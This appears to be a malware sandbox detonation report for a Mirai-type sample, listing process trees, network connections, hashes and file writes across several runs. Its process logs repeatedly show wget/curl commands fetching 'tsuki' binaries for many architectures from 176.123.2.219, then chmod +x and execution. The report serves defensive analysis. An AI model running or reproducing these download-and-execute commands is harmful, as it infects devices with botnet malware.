[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-66fb0596873243b6a8b63dce4a4ab928-systemd-timedated.service-qO2O8L tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-22 00:17
Reported
2024-07-22 00:20
Platform
debian9-mipsbe-20240418-en
Max time kernel
87s
Max time network
90s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki | /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
Processes
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
[/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-22 00:17
Reported
2024-07-22 00:19
Platform
debian9-mipsel-20240611-en
Max time kernel
48s
Max time network
50s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki | /tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
Processes
/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
[/tmp/95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae systemd-private-c985af6e81ad42d18f9a4e3b7f1a966c-systemd-timedated.service-t4QlXg tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x 95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files